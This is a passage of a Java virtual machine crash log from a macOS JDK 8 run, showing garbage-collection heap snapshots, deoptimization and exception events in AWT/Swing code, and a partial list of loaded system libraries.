[0x00000006c0000000,0x00000006c0bd71b8,0x00000006c8000000)\r\n Metaspace       used 38067K, capacity 38468K, committed 38784K, reserved 1083392K\r\n  class space    used 5082K, capacity 5176K, committed 5248K, reserved 1048576K\r\nEvent: 6.091 GC heap after\r\nHeap after GC invocations=7 (full 2):\r\n PSYoungGen      total 125440K, used 10737K [0x000000076ab00000, 0x0000000777a80000, 0x00000007c0000000)\r\n  eden space 114688K, 0% used [0x000000076ab00000,0x000000076ab00000,0x0000000771b00000)\r\n  from space 10752K, 99% used [0x0000000771b00000,0x000000077257c640,0x0000000772580000)\r\n  to   space 19456K, 0% used [0x0000000776780000,0x0000000776780000,0x0000000777a80000)\r\n ParOldGen       total 131072K, used 24922K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c1856988,0x00000006c8000000)\r\n Metaspace       used 38067K, capacity 38468K, committed 38784K, reserved 1083392K\r\n  class space    used 5082K, capacity 5176K, committed 5248K, reserved 1048576K\r\n}\r\nEvent: 7.753 GC heap before\r\n{Heap before GC invocations=8 (full 2):\r\n PSYoungGen      total 125440K, used 125425K [0x000000076ab00000, 0x0000000777a80000, 0x00000007c0000000)\r\n  eden space 114688K, 100% used [0x000000076ab00000,0x0000000771b00000,0x0000000771b00000)\r\n  from space 10752K, 99% used [0x0000000771b00000,0x000000077257c640,0x0000000772580000)\r\n  to   space 19456K, 0% used [0x0000000776780000,0x0000000776780000,0x0000000777a80000)\r\n ParOldGen       total 131072K, used 24922K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c1856988,0x00000006c8000000)\r\n Metaspace       used 38657K, capacity 39100K, committed 39552K, reserved 1083392K\r\n  class space    used 5093K, capacity 5212K, committed 5248K, reserved 1048576K\r\nEvent: 7.761 GC heap after\r\nHeap after GC invocations=8 (full 2):\r\n PSYoungGen      total 186880K, used 17637K [0x000000076ab00000, 0x0000000777a80000, 0x00000007c0000000)\r\n  eden space 167424K, 0% used [0x000000076ab00000,0x000000076ab00000,0x0000000774e80000)\r\n  from space 19456K, 90% used [0x0000000776780000,0x00000007778b9508,0x0000000777a80000)\r\n  to   space 22528K, 0% used [0x0000000774e80000,0x0000000774e80000,0x0000000776480000)\r\n ParOldGen       total 131072K, used 24930K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c1858988,0x00000006c8000000)\r\n Metaspace       used 38657K, capacity 39100K, committed 39552K, reserved 1083392K\r\n  class space    used 5093K, capacity 5212K, committed 5248K, reserved 1048576K\r\n}\r\nEvent: 10.421 GC heap before\r\n{Heap before GC invocations=9 (full 2):\r\n PSYoungGen      total 186880K, used 185061K [0x000000076ab00000, 0x0000000777a80000, 0x00000007c0000000)\r\n  eden space 167424K, 100% used [0x000000076ab00000,0x0000000774e80000,0x0000000774e80000)\r\n  from space 19456K, 90% used [0x0000000776780000,0x00000007778b9508,0x0000000777a80000)\r\n  to   space 22528K, 0% used [0x0000000774e80000,0x0000000774e80000,0x0000000776480000)\r\n ParOldGen       total 131072K, used 24930K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c1858988,0x00000006c8000000)\r\n Metaspace       used 39392K, capacity 39814K, committed 40064K, reserved 1083392K\r\n  class space    used 5114K, capacity 5213K, committed 5248K, reserved 1048576K\r\nEvent: 10.430 GC heap after\r\nHeap after GC invocations=9 (full 2):\r\n PSYoungGen      total 189952K, used 17223K [0x000000076ab00000, 0x000000077be80000, 0x00000007c0000000)\r\n  eden space 167424K, 0% used [0x000000076ab00000,0x000000076ab00000,0x0000000774e80000)\r\n  from space 22528K, 76% used [0x0000000774e80000,0x0000000775f51c10,0x0000000776480000)\r\n  to   space 23552K, 0% used [0x000000077a780000,0x000000077a780000,0x000000077be80000)\r\n ParOldGen       total 131072K, used 24938K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c185a988,0x00000006c8000000)\r\n Metaspace       used 39392K, capacity 39814K, committed 40064K, reserved 1083392K\r\n  class space    used 5114K, capacity 5213K, committed 5248K, reserved 1048576K\r\n}\r\nEvent: 11.608 GC heap before\r\n{Heap before GC invocations=10 (full 2):\r\n PSYoungGen      total 189952K, used 184647K [0x000000076ab00000, 0x000000077be80000, 0x00000007c0000000)\r\n  eden space 167424K, 100% used [0x000000076ab00000,0x0000000774e80000,0x0000000774e80000)\r\n  from space 22528K, 76% used [0x0000000774e80000,0x0000000775f51c10,0x0000000776480000)\r\n  to   space 23552K, 0% used [0x000000077a780000,0x000000077a780000,0x000000077be80000)\r\n ParOldGen       total 131072K, used 24938K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c185a988,0x00000006c8000000)\r\n Metaspace       used 39540K, capacity 39942K, committed 40320K, reserved 1085440K\r\n  class space    used 5116K, capacity 5213K, committed 5248K, reserved 1048576K\r\nEvent: 11.614 GC heap after\r\nHeap after GC invocations=10 (full 2):\r\n PSYoungGen      total 246272K, used 15118K [0x000000076ab00000, 0x000000077b880000, 0x00000007c0000000)\r\n  eden space 228864K, 0% used [0x000000076ab00000,0x000000076ab00000,0x0000000778a80000)\r\n  from space 17408K, 86% used [0x000000077a780000,0x000000077b643830,0x000000077b880000)\r\n  to   space 23552K, 0% used [0x0000000778a80000,0x0000000778a80000,0x000000077a180000)\r\n ParOldGen       total 131072K, used 24946K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c185c988,0x00000006c8000000)\r\n Metaspace       used 39540K, capacity 39942K, committed 40320K, reserved 1085440K\r\n  class space    used 5116K, capacity 5213K, committed 5248K, reserved 1048576K\r\n}\r\nEvent: 20.696 GC heap before\r\n{Heap before GC invocations=11 (full 2):\r\n PSYoungGen      total 246272K, used 243982K [0x000000076ab00000, 0x000000077b880000, 0x00000007c0000000)\r\n  eden space 228864K, 100% used [0x000000076ab00000,0x0000000778a80000,0x0000000778a80000)\r\n  from space 17408K, 86% used [0x000000077a780000,0x000000077b643830,0x000000077b880000)\r\n  to   space 23552K, 0% used [0x0000000778a80000,0x0000000778a80000,0x000000077a180000)\r\n ParOldGen       total 131072K, used 24946K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c185c988,0x00000006c8000000)\r\n Metaspace       used 39987K, capacity 40428K, committed 40832K, reserved 1085440K\r\n  class space    used 5122K, capacity 5246K, committed 5248K, reserved 1048576K\r\nEvent: 20.704 GC heap after\r\nHeap after GC invocations=11 (full 2):\r\n PSYoungGen      total 252416K, used 17991K [0x000000076ab00000, 0x000000077e400000, 0x00000007c0000000)\r\n  eden space 228864K, 0% used [0x000000076ab00000,0x000000076ab00000,0x0000000778a80000)\r\n  from space 23552K, 76% used [0x0000000778a80000,0x0000000779c11c10,0x000000077a180000)\r\n  to   space 24576K, 0% used [0x000000077cc00000,0x000000077cc00000,0x000000077e400000)\r\n ParOldGen       total 131072K, used 24954K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c185e988,0x00000006c8000000)\r\n Metaspace       used 39987K, capacity 40428K, committed 40832K, reserved 1085440K\r\n  class space    used 5122K, capacity 5246K, committed 5248K, reserved 1048576K\r\n}\r\n\r\nDeoptimization events (10 events):\r\nEvent: 21.003 Thread 0x00007f944591c800 Uncommon trap: reason=unstable_if action=reinterpret pc=0x000000010d541a8c method=java.awt.Toolkit$SelectiveAWTEventListener.eventDispatched(Ljava/awt/AWTEvent;)V @ 240\r\nEvent: 21.010 Thread 0x00007f944591c800 Uncommon trap: reason=unstable_if action=reinterpret pc=0x000000010d8ec29c method=java.awt.geom.AffineTransform.updateState()V @ 148\r\nEvent: 21.010 Thread 0x00007f944591c800 Uncommon trap: reason=unstable_if action=reinterpret pc=0x000000010d83ae4c method=java.awt.geom.AffineTransform.translate(DD)V @ 249\r\nEvent: 21.011 Thread 0x00007f944591c800 Uncommon trap: reason=unstable_if action=reinterpret pc=0x000000010d819624 method=java.awt.geom.AffineTransform.updateState()V @ 148\r\nEvent: 21.051 Thread 0x00007f944591c800 Uncommon trap: reason=class_check action=maybe_recompile pc=0x000000010d56fbdc method=java.awt.EventQueue.coalesceEvent(Ljava/awt/AWTEvent;I)Z @ 77\r\nEvent: 21.051 Thread 0x00007f944591c800 Uncommon trap: reason=class_check action=maybe_recompile pc=0x000000010c9d4408 method=java.awt.EventQueue.setCurrentEventAndMostRecentTimeImpl(Ljava/awt/AWTEvent;)V @ 53\r\nEvent: 21.051 Thread 0x00007f944591c800 Uncommon trap: reason=class_check action=maybe_recompile pc=0x000000010c9d4408 method=java.awt.EventQueue.setCurrentEventAndMostRecentTimeImpl(Ljava/awt/AWTEvent;)V @ 53\r\nEvent: 21.097 Thread 0x00007f944591c800 Uncommon trap: reason=class_check action=maybe_recompile pc=0x000000010d56fbdc method=java.awt.EventQueue.coalesceEvent(Ljava/awt/AWTEvent;I)Z @ 77\r\nEvent: 21.177 Thread 0x00007f944591c800 Uncommon trap: reason=class_check action=maybe_recompile pc=0x000000010d56fbdc method=java.awt.EventQueue.coalesceEvent(Ljava/awt/AWTEvent;I)Z @ 77\r\nEvent: 21.500 Thread 0x00007f944591c800 Uncommon trap: reason=unstable_if action=reinterpret pc=0x000000010cc10888 method=javax.swing.table.DefaultTableCellRenderer.setValue(Ljava/lang/Object;)V @ 2\r\n\r\nInternal exceptions (10 events):\r\nEvent: 5.243 Thread 0x00007f944591c800 Exception <a 'java/io/FileNotFoundException'> (0x000000076d3e0eb8) thrown at [/Users/java_re/workspace/8-2-build-macosx-x86_64/jdk8u60/4407/hotspot/src/share/vm/prims/jni.cpp, line 709]\r\nEvent: 5.244 Thread 0x00007f944591c800 Exception <a 'java/io/FileNotFoundException'> (0x000000076d40a450) thrown at [/Users/java_re/workspace/8-2-build-macosx-x86_64/jdk8u60/4407/hotspot/src/share/vm/prims/jni.cpp, line 709]\r\nEvent: 5.258 Thread 0x00007f944591c800 Exception <a 'java/io/FileNotFoundException'> (0x000000076d6ec090) thrown at [/Users/java_re/workspace/8-2-build-macosx-x86_64/jdk8u60/4407/hotspot/src/share/vm/prims/jni.cpp, line 709]\r\nEvent: 5.259 Thread 0x00007f944591c800 Exception <a 'java/io/FileNotFoundException'> (0x000000076d713cc0) thrown at [/Users/java_re/workspace/8-2-build-macosx-x86_64/jdk8u60/4407/hotspot/src/share/vm/prims/jni.cpp, line 709]\r\nEvent: 6.443 Thread 0x00007f944591c800 Implicit null exception at 0x000000010d014747 to 0x000000010d0150c5\r\nEvent: 10.125 Thread 0x00007f944591c800 Implicit null exception at 0x000000010d251753 to 0x000000010d251a67\r\nEvent: 10.125 Thread 0x00007f944591c800 Implicit null exception at 0x000000010d25b7b1 to 0x000000010d25bddb\r\nEvent: 11.297 Thread 0x00007f944591c800 Implicit null exception at 0x000000010d487e13 to 0x000000010d4887a1\r\nEvent: 11.306 Thread 0x00007f944591c800 Implicit null exception at 0x000000010ca684ef to 0x000000010ca689a9\r\nEvent: 18.616 Thread 0x00007f944591c800 Implicit null exception at 0x000000010d9a4791 to 0x000000010d9a4dbd\r\n\r\nEvents (10 events):\r\nEvent: 21.051 Thread 0x00007f944591c800 DEOPT UNPACKING pc=0x000000010c497229 sp=0x0000700007747768 mode 2\r\nEvent: 21.097 Thread 0x00007f944591c800 Uncommon trap: trap_request=0xffffffde fr.pc=0x000000010d56fbdc\r\nEvent: 21.097 Thread 0x00007f944591c800 DEOPT PACKING pc=0x000000010d56fbdc sp=0x0000700007749400\r\nEvent: 21.097 Thread 0x00007f944591c800 DEOPT UNPACKING pc=0x000000010c497229 sp=0x00007000077493b8 mode 2\r\nEvent: 21.177 Thread 0x00007f944591c800 Uncommon trap: trap_request=0xffffffde fr.pc=0x000000010d56fbdc\r\nEvent: 21.177 Thread 0x00007f944591c800 DEOPT PACKING pc=0x000000010d56fbdc sp=0x0000700007749400\r\nEvent: 21.177 Thread 0x00007f944591c800 DEOPT UNPACKING pc=0x000000010c497229 sp=0x00007000077493b8 mode 2\r\nEvent: 21.500 Thread 0x00007f944591c800 Uncommon trap: trap_request=0xffffff65 fr.pc=0x000000010cc10888\r\nEvent: 21.500 Thread 0x00007f944591c800 DEOPT PACKING pc=0x000000010cc10888 sp=0x0000700007747100\r\nEvent: 21.500 Thread 0x00007f944591c800 DEOPT UNPACKING pc=0x000000010c497229 sp=0x00007000077470d0 mode 2\r\n\r\n\r\nDynamic libraries:\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Security.framework/Versions/A/Security\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices\r\n0x000000000ecb7000 \t/usr/lib/libz.1.dylib\r\n0x000000000ecb7000 \t/usr/lib/libSystem.B.dylib\r\n0x000000000ecb7000 \t/usr/lib/libobjc.A.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation\r\n0x000000000ecb7000 \t/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreData.framework/Versions/A/CoreData\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/RemoteViewServices.framework/Versions/A/RemoteViewServices\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/UIFoundation.framework/Versions/A/UIFoundation\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/DFRFoundation.framework/Versions/A/DFRFoundation\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Metal.framework/Versions/A/Metal\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/DesktopServicesPriv\r\n0x000000000ecb7000 \t/usr/lib/libenergytrace.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/SkyLight.framework/Versions/A/SkyLight\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics\r\n0x000000000ecb7000 \t/usr/lib/libScreenReader.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate\r\n0x000000000ecb7000 \t/System/Library/Frameworks/IOSurface.framework/Versions/A/IOSurface\r\n0x000000000ecb7000 \t/System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox\r\n0x000000000ecb7000 \t/System/Library/Frameworks/AudioUnit.framework/Versions/A/AudioUnit\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/DataDetectorsCore.framework/Versions/A/DataDetectorsCore\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox\r\n0x000000000ecb7000 \t/usr/lib/libicucore.A.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/SignpostNotification.framework/Versions/A/SignpostNotification\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SpeechRecognition.framework/Versions/A/SpeechRecognition\r\n0x000000000ecb7000 \t/usr/lib/libauto.dylib\r\n0x000000000ecb7000 \t/usr/lib/libxml2.2.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/CoreUI.framework/Versions/A/CoreUI\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio\r\n0x000000000ecb7000 \t/System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration\r\n0x000000000ecb7000 \t/usr/lib/liblangid.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/MultitouchSupport.framework/Versions/A/MultitouchSupport\r\n0x000000000ecb7000 \t/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit\r\n0x000000000ecb7000 \t/usr/lib/libDiagnosticMessagesClient.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/PerformanceAnalysis\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ColorSync.framework/Versions/A/ColorSync\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreImage.framework/Versions/A/CoreImage\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreText.framework/Versions/A/CoreText\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/Backup.framework/Versions/A/Backup\r\n0x000000000ecb7000 \t/usr/lib/libarchive.2.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork\r\n0x000000000ecb7000 \t/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration\r\n0x000000000ecb7000 \t/usr/lib/libCRFSuite.dylib\r\n0x000000000ecb7000 \t/usr/lib/libc++.1.dylib\r\n0x000000000ecb7000 \t/usr/lib/libc++abi.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libcache.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libcommonCrypto.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libcompiler_rt.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libcopyfile.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libcorecrypto.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libdispatch.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libdyld.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libkeymgr.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/liblaunch.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libmacho.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libquarantine.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libremovefile.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_asl.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_blocks.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_c.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_configuration.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_coreservices.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_darwin.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_dnssd.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_info.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_m.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_malloc.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_network.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_networkextension.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_notify.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_sandbox.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_secinit.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_kernel.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_platform.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_pthread.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_symptoms.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libsystem_trace.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libunwind.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libxpc.dylib\r\n0x000000000ecb7000 \t/usr/lib/closure/libclosured.dylib\r\n0x000000000ecb7000 \t/usr/lib/libbsm.0.dylib\r\n0x000000000ecb7000 \t/usr/lib/system/libkxld.dylib\r\n0x000000000ecb7000 \t/usr/lib/libOpenScriptingUtil.dylib\r\n0x000000000ecb7000 \t/usr/lib/libcoretls.dylib\r\n0x000000000ecb7000 \t/usr/lib/libcoretls_cfhelpers.dylib\r\n0x000000000ecb7000 \t/usr/lib/libpam.2.dylib\r\n0x000000000ecb7000 \t/usr/lib/libsqlite3.dylib\r\n0x000000000ecb7000 \t/usr/lib/libxar.1.dylib\r\n0x000000000ecb7000 \t/usr/lib/libbz2.1.0.dylib\r\n0x000000000ecb7000 \t/usr/lib/liblzma.5.dylib\r\n0x000000000ecb7000 \t/usr/lib/libnetwork.dylib\r\n0x000000000ecb7000 \t/usr/lib/libapple_nghttp2.dylib\r\n0x000000000ecb7000 \t/usr/lib/libpcap.A.dylib\r\n0x000000000ecb7000 \t/usr/lib/libboringssl.dylib\r\n0x000000000ecb7000 \t/usr/lib/libusrtcp.dylib\r\n0x000000000ecb7000 \t/usr/lib/libapple_crypto.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/FSEvents\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCore\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Metadata\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/OSServices\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKit\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/AE\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/LaunchServices\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/DictionaryServices\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SharedFileList.framework/Versions/A/SharedFileList\r\n0x000000000ecb7000 \t/System/Library/Frameworks/NetFS.framework/Versions/A/NetFS\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/NetAuth.framework/Versions/A/NetAuth\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/login.framework/Versions/A/Frameworks/loginsupport.framework/Versions/A/loginsupport\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/TCC.framework/Versions/A/TCC\r\n0x000000000ecb7000 \t/usr/lib/libmecabra.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/ATS\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ColorSyncLegacy.framework/Versions/A/ColorSyncLegacy\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/HIServices.framework/Versions/A/HIServices\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysis\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCore\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/QD\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesis\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreDisplay.framework/Versions/A/CoreDisplay\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImage\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/vecLib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBNNS.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libQuadrature.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMisc.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLinearAlgebra.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libSparse.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libSparseBLAS.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/GPUWrangler.framework/Versions/A/GPUWrangler\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/IOAccelerator.framework/Versions/A/IOAccelerator\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/IOPresentment.framework/Versions/A/IOPresentment\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/DSExternalDisplay.framework/Versions/A/DSExternalDisplay\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreFSCache.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/CoreVideo.framework/Versions/A/CoreVideo\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/GraphVisualizer.framework/Versions/A/GraphVisualizer\r\n0x000000000ecb7000 \t/System/Library/Frameworks/MetalPerformanceShaders.framework/Versions/A/MetalPerformanceShaders\r\n0x000000000ecb7000 \t/usr/lib/libFosl_dynamic.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/FaceCore.framework/Versions/A/FaceCore\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenCL.framework/Versions/A/OpenCL\r\n0x000000000ecb7000 \t/usr/lib/libcompression.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontParser.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontRegistry.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libTIFF.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libPng.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libGIF.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJP2.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libRadiance.dylib\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/AppleJPEG.framework/Versions/A/AppleJPEG\r\n0x000000000ecb7000 \t/System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSCore.framework/Versions/A/MPSCore\r\n0x000000000ecb7000 \t/System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSImage.framework/Versions/A/MPSImage\r\n0x000000000ecb7000 \t/System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSNeuralNetwork.framework/Versions/A/MPSNeuralNetwork\r\n0x000000000ecb7000 \t/System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSMatrix.framework/Versions/A/MPSMatrix\r\n0x000000000ecb7000 \t/System/Library/PrivateFrameworks/MetalTools.framework/Versions/A/MetalTools\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLU.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGFXShared.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLImage.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCVMSPluginSupport.dylib\r\n0x000000000ecb7000 \t/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreVMClient.dylib\r\n0x000000000ecb7000 \t/usr/lib/libcups.2.dylib\r\n0x000000000ecb7000 